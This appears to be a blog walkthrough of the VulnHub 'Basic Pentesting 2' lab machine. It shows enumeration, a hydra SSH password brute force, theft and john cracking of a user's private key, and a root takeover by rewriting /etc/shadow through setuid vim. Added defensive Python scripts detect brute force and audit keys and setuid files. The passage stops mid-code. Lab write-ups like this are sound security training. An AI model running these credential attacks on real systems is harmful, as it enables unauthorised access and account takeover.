VulnHub Basic Pentesting 2 notes
Basic Pentesting 2
Unpacking the archive gave me an OVA file, but just importing the OVA did not bring the VM's link up on the internal network.
(This applies to my particular setup.)
Choosing "recovery mode" at boot and then "network Enable networking" brought the link up.
If you are going to keep powering the VM on and off, this needs to be set up to happen automatically.
Service enumeration
# nmap -Pn -p- 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00011s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds

# nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00081s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
Points of interest
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
- [port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 8009] ajp13 Apache Jserv (Protocol v1.3)
- [port 8080] http Apache Tomcat 9.0.7
So this time it's a spring Apache festival.
Details
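The list above is the hand-made version of a step worth automating: pull the port, service and version columns out of the -sV output and collapse ports that expose the same thing (139 and 445 here are one Samba). The following Python script is an added example, not part of the original writeup; it embeds the -sV output from the page as its sample input so it runs offline.

```python
"""Parse 'nmap -sV' normal output and build the per-service summary that the
list above was written by hand.

Added example, not from the original writeup. SAMPLE_SV is the -sV output
shown on the page, embedded so the parser runs offline.
"""
import re

SAMPLE_SV = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00081s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<host>\S+)")
# "22/tcp   open  ssh   OpenSSH 7.2p2 ..." ; the VERSION column is optional
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)
INFO_RE = re.compile(r"^Service Info: (?P<info>.*)$")


def parse_nmap_sv(text):
    """Return [{host, ports: [{port, proto, state, service, version}], service_info}]."""
    hosts, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            cur = {"host": m["host"], "ports": [], "service_info": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue  # banner lines before the first scan report
        m = PORT_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            cur["ports"].append(rec)
            continue
        m = INFO_RE.match(line)
        if m:
            cur["service_info"] = m["info"]
    return hosts


def summarize(host):
    """Collapse open ports that share a service/version string into one
    '[port N,M] service version' line, in first-seen order."""
    groups = {}  # (service, version) -> [ports]; dict keeps insertion order
    for p in host["ports"]:
        if p["state"] != "open":
            continue
        groups.setdefault((p["service"], p["version"] or ""), []).append(p["port"])
    return [
        f"[port {','.join(str(n) for n in ports)}] {svc} {ver}".rstrip()
        for (svc, ver), ports in groups.items()
    ]


if __name__ == "__main__":
    for h in parse_nmap_sv(SAMPLE_SV):
        print(h["host"], "-", h["service_info"])
        for line in summarize(h):
            print(" ", line)
```

Feeding a multi-host scan to parse_nmap_sv() yields one record per "Nmap scan report" block, so the same summarize() call works across a subnet sweep.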
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
I have a feeling that once before I also ended up with "the only thing here is Username Enumeration" on this version.
Brute forcing isn't smart, so none of that.
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        80
+ Start Time:         2020-05-04 23:48:50 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 23:49:15 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.11

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 4 23:49:46 2020
URL_BASE: http://10.10.10.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.11/ ----
==> DIRECTORY: http://10.10.10.11/development/
+ http://10.10.10.11/index.html (CODE:200|SIZE:158)
+ http://10.10.10.11/server-status (CODE:403|SIZE:299)

---- Entering directory: http://10.10.10.11/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon May 4 23:49:50 2020
DOWNLOADED: 4612 - FOUND: 2

# dirb http://10.10.10.11/development/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 4 23:50:03 2020
URL_BASE: http://10.10.10.11/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.11/development/ ----

-----------------
END_TIME: Mon May 4 23:50:07 2020
DOWNLOADED: 4612 - FOUND: 0
"/development" looks suspicious.
# curl http://10.10.10.11
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
Found "dev.txt" and "j.txt" under "/development/".
# curl http://10.10.10.11/development/dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

# curl http://10.10.10.11/development/j.txt
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K
Apache Struts?
Does "struts" mean "Apache Struts"?
If so, they seem to be running "Apache Struts 2.5.12".
# searchsploit apache
(snip)
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
Found exploit code, but I can't tell what the target is, so I'm putting this on hold.
According to K, J's password hash is weak?
I sensed a hint at directory traversal to /etc/shadow, but couldn't work it out.
[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# smbclient -L 10.10.10.11
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
This Samba is "Samba Server 4.3.11-Ubuntu".
Come to think of it, smbclient has never worked for me before; maybe it only works when anonymous login is enabled.
# enum4linux 10.10.10.11
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 00:25:23 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

(snip)

 =====================================
|    OS information on 10.10.10.11    |
 =====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.11 from smbclient:
[+] Got OS info for 10.10.10.11 from srvinfo:
	BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

(snip)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================
|    Getting printer info for 10.10.10.11    |
 ============================================
No printers returned.

enum4linux complete on Tue May 5 00:25:38 2020
Login attempts as "kay" and "jan" didn't work.
hydra told me the user didn't exist.
The exploit apparently only works locally, so I gave up on it.
No idea.
[port 8009] ajp13 Apache Jserv (Protocol v1.3)
Rather than paying much attention to this one itself, should I be looking at Tomcat?
[port 8080] http Apache Tomcat 9.0.7
# nikto -h 10.10.10.11 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        8080
+ Start Time:         2020-05-05 00:49:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-05-05 00:49:33 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.11:8080

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 5 00:49:59 2020
URL_BASE: http://10.10.10.11:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.11:8080/ ----
+ http://10.10.10.11:8080/docs (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/examples (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.10.11:8080/manager (CODE:302|SIZE:0)

-----------------
END_TIME: Tue May 5 00:50:03 2020
DOWNLOADED: 4612 - FOUND: 5
For now I'll point hydra at "/manager/html".
(It ran far too long, so I gave up.)
Still, if PUT is allowed, maybe that is the real way in?
No. PUT didn't work.
Not sure what else to try, so a dictionary attack on ssh
What was that about jan's password being weak? I still don't get it.
I guess all that's left is to try ssh.
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

(snip)
[22][ssh] host: 10.10.10.11   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33
Huh, so "weak password hash" just meant an ssh dictionary attack would do it.
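Seen from the host, the hydra run above is loud: sshd writes one "Failed password" line per guess to /var/log/auth.log, and a success arriving right after a burst of failures from the same source is the pattern an incident responder looks for. The script below is an added example, not from the original writeup; its log lines are constructed to mimic what OpenSSH on Ubuntu 16.04 would have written during such a run (host name, PIDs and the source address 10.10.10.20 are made up).

```python
"""Spot SSH password-guessing bursts in auth.log-style lines.

Added example, not from the original writeup. SAMPLE_LOG is constructed to
look like /var/log/auth.log on Ubuntu 16.04 during a run like the hydra one
above: many 'Failed password' lines from one source in a short window, then
one 'Accepted password'. Host name, PIDs and 10.10.10.20 are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# "May  5 06:02:01 basic2 sshd[1500]: Failed password for jan from 10.10.10.20 port 40000 ssh2"
# "May  5 06:10:00 basic2 sshd[1600]: Failed password for invalid user admin from 10.10.10.30 port 50000 ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

_ATTACKER = "10.10.10.20"  # constructed source address
SAMPLE_LOG = [
    f"May  5 06:02:{s:02d} basic2 sshd[{1500 + s}]: Failed password for jan "
    f"from {_ATTACKER} port {40000 + s} ssh2"
    for s in range(12)
] + [
    f"May  5 06:02:13 basic2 sshd[1520]: Accepted password for jan from {_ATTACKER} port 40020 ssh2",
    "May  5 06:10:00 basic2 sshd[1600]: Failed password for invalid user admin from 10.10.10.30 port 50000 ssh2",
    "May  5 06:11:00 basic2 sshd[1601]: Failed password for kay from 10.10.10.30 port 50001 ssh2",
]


def _parse_ts(ts, year=2020):
    # syslog timestamps carry no year; the sample assumes 2020
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def find_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {(ip, user): info} for every source/user pair that reached
    `threshold` failures inside some `window_seconds` window. info carries the
    total failures, the densest window, and whether the same pair later
    logged in successfully (the case that needs a response, not just a block)."""
    failures = defaultdict(list)
    accepted = set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key].append(_parse_ts(m["ts"]))
        else:
            accepted.add(key)
    alerts = {}
    for key, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = {
                "failures": len(times),
                "peak_in_window": peak,
                "then_succeeded": key in accepted,
            }
    return alerts


if __name__ == "__main__":
    for (ip, user), info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} -> {user}: {info}")
```

The two stray failures from 10.10.10.30 stay below the threshold, which is the point of windowing by (source, user) rather than counting all failures on the host; keying by source alone would also catch password spraying across many users.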
# ssh jan@10.10.10.11
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts.
jan@10.10.10.11's password:
(snip)
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ id
uid=1001(jan) gid=1001(jan) groups=1001(jan)
jan@basic2:~$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.
No sudo allowed.
Can't find an Apache password file anywhere.
jan@basic2:/home/kay$ ls -al /home/jan/
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst
jan@basic2:/home/kay$ ls -al /home/kay/
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
kay's home directory is pretty well stocked.
Oh, there's a .ssh directory, so I might be able to log in with it.
jan@basic2:/home/kay$ ls -al ./.ssh
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey
jan@10.10.10.11's password:
id_rsa                                        100% 3326   293.3KB/s   00:00
# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password:
So it wants a password.
# ls /usr/share/john/ | grep ssh
ssh2john.py
# /usr/share/john/ssh2john.py sshkey > kayssh
# john --wordlist=/usr/share/wordlists/rockyou.txt kayssh
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (sshkey)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos!
Session completed
Right, this should do it.
# ssh -i sshkey kay@10.10.10.11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "sshkey": bad permissions
kay@10.10.10.11's password:
Logging in with the private key I pulled down locally apparently doesn't work, so I logged in as jan again and did the ssh login from there.
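Two things about kay's key are worth noting from the defender's side. The "UNPROTECTED PRIVATE KEY FILE" messages above are ssh refusing a key file whose mode grants any access to group or other (0644 on the box, 0777 after the copy), which is why it fell back to asking for a password; and the key was stored in the traditional PEM format, whose single-round MD5 key derivation is why john could try over a million passphrases per second against it. The script below is an added example, not from the writeup: it audits a key file for both conditions and reads the cipher name from either the PEM headers or the openssh-key-v1 container. The key texts it uses are constructed placeholders, not real key material, and run_demo() writes them to a temp directory with the file modes from the writeup.

```python
"""Audit an SSH private key file for the two weaknesses seen on the box:
a file mode that lets other users read it, and a passphrase that is either
missing or only protected by the legacy PEM key derivation.

Added example, not from the original writeup. The key texts are constructed
stand-ins (PEM bodies are placeholder base64; the openssh-key-v1 sample is
assembled from the real header layout so the parser is exercised).
"""
import base64
import os
import stat
import struct
import tempfile


def _ssh_string(data):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def key_encryption(key_text):
    """Return (format, cipher): format is 'pem' or 'openssh'; cipher is the
    name recorded in the file, or 'none' when the key is stored in the clear."""
    lines = key_text.strip().splitlines()
    if not lines or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM-style key file")
    if "OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        # layout: magic, string ciphername, string kdfname, string kdfoptions, ...
        off = len(magic)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        return "openssh", blob[off + 4:off + 4 + n].decode()
    # traditional PEM: an encrypted key carries 'Proc-Type: 4,ENCRYPTED' and
    # 'DEK-Info: <cipher>,<iv>' header lines before the base64 body
    for line in lines[1:-1]:
        if line.startswith("DEK-Info:"):
            return "pem", line.split(":", 1)[1].strip().split(",")[0].lower()
        if ":" not in line:
            break  # reached the body
    return "pem", "none"


def audit_key_file(path):
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path) as f:
        fmt, cipher = key_encryption(f.read())
    findings = []
    if mode & 0o077:  # the same test ssh applies before 'UNPROTECTED PRIVATE KEY FILE'
        findings.append(f"mode {mode:04o}: accessible to group/other")
    if cipher == "none":
        findings.append("no passphrase: whoever can read the file can use the key")
    elif fmt == "pem":
        # PEM derives the key with one MD5 round (john's 'Cost 1 ... is 0'),
        # so offline guessing is cheap; 'ssh-keygen -p -o -a 100 -f KEY'
        # rewrites the key with the bcrypt KDF instead
        findings.append(f"legacy PEM encryption ({cipher}, MD5 KDF): cheap to guess offline")
    return {"path": path, "mode": mode, "format": fmt, "cipher": cipher, "findings": findings}


# constructed samples: the base64 bodies are placeholders, not key material
SAMPLE_PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

cGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""
SAMPLE_PEM_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
cGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""


def make_openssh_container(cipher):
    """Build just enough of an openssh-key-v1 file for the header parser."""
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = b"openssh-key-v1\x00" + _ssh_string(cipher.encode()) + _ssh_string(kdf) + _ssh_string(b"")
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def run_demo():
    """Write the samples with the modes from the writeup (0644 for kay's
    id_rsa, 0777 for the copied one) and audit each; returns {name: result}."""
    d = tempfile.mkdtemp()
    cases = {
        "kay_id_rsa_0644": (SAMPLE_PEM_ENCRYPTED, 0o644),
        "plain_0600": (SAMPLE_PEM_PLAIN, 0o600),
        "openssh_aes256_0600": (make_openssh_container("aes256-ctr"), 0o600),
        "openssh_none_0777": (make_openssh_container("none"), 0o777),
    }
    results = {}
    for name, (text, mode) in cases.items():
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write(text)
        os.chmod(p, mode)
        results[name] = audit_key_file(p)
    return results


if __name__ == "__main__":
    for name, r in run_demo().items():
        print(name, r["format"], r["cipher"], r["findings"] or "ok")
```

Pointing audit_key_file() at every id_* file under /home on a fleet gives a quick inventory of keys that are world-readable, unencrypted, or still in the legacy PEM format.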
jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key './.ssh/id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ sudo -l
[sudo] password for kay:
Sorry, try again.
[sudo] password for kay:
sudo: 1 incorrect password attempt
Right, I don't know kay's password, so I can't get to root.
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
I couldn't read this earlier; what is it?
kay@basic2:~$ cat .bash_history
ls -al
cat pass.bak
cat /dev/null > .bash_history
sudo su
ls -al
cat /dev/null > .bash_history
cd /tmp
ls -al
cd /home/jan
ls -al
sudo less .viminfo
sudo cat /dev/null > .viminfo
sudo rm .viminfo
less .lesshst
sudo less .lesshst
cd /home/kay/
ls -al
less .bash
less .bash_history
exit
/bin/less /etc/shadow
which /bin/less
/bin/less
/bin/less /etc/passwd
sh
sudo chmod u-s /bin/less
/bin/less
ls -al /bin/les
ls -al /bin/less
sudo chmod u-s /bin/nc.traditional
which nc.traditional
ls -al /bin/nc*
find / -perm -u=s -type f 2>/dev/null
which vim
sudo chmod u+s /usr/bin/vim
ls -al /usr/bin/vim
vim /etc/passwd
ls -al
ls -al /bin/vim
vim /etc/shadow
vim /etc/passwd
cat /etc/passwd
vi /etc/passwd
cat /etc/passwd
ls -al /etc/passwd
ifconfig
exit
This user can touch /etc/shadow.
Or so I thought, but it looks like that needed sudo.
No wait, there's "sudo chmod u+s /usr/bin/vim": vim is made setuid right here.
kay@basic2:~$ openssl passwd -1 pass
$1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9.
kay@basic2:~$ vim /etc/shadow
kay@basic2:~$ sudo su
[sudo] password for kay:
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
Just overwrite kay's password in shadow.
:wq! complains, but thanks to the setuid bit the write goes through anyway.
The truth about pass.bak
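The "find / -perm -u=s -type f" in kay's history is also what a defender should be running on a schedule: a setuid /usr/bin/vim is exactly the kind of change that a diff against a clean baseline catches before it gets used like this. The script below is an added example, not from the writeup. Its baseline is a constructed excerpt of an Ubuntu 16.04 setuid inventory, and run_demo() builds a constructed directory tree (the expected binaries plus a setuid vim, and a less with the bit cleared) instead of scanning the real system.

```python
"""Inventory setuid/setgid executables under a root and diff the result
against a known-good baseline: the defender's version of the
'find / -perm -u=s -type f' from kay's bash history.

Added example, not from the original writeup. BASELINE is a constructed
excerpt of what an Ubuntu 16.04 install ships setuid; run_demo() scans a
constructed temp tree, not the host.
"""
import os
import stat
import tempfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID

# constructed excerpt of a baseline; a real one is taken from a clean install
# of the same release and kept somewhere the audited host cannot modify
BASELINE = {"bin/su", "bin/ping", "usr/bin/passwd", "usr/bin/sudo", "usr/bin/chsh"}


def find_setid(root):
    """Yield (path, mode) for regular files with the setuid or setgid bit set.
    Symlinks are not followed; unreadable directories are skipped."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID_BITS:
                yield p, stat.S_IMODE(st.st_mode)


def setid_inventory(root):
    """Map path-relative-to-root -> mode so results compare across hosts."""
    return {os.path.relpath(p, root): m for p, m in find_setid(root)}


def compare(inventory, baseline):
    """'unexpected' is what privesc preparation looks like (a setuid editor);
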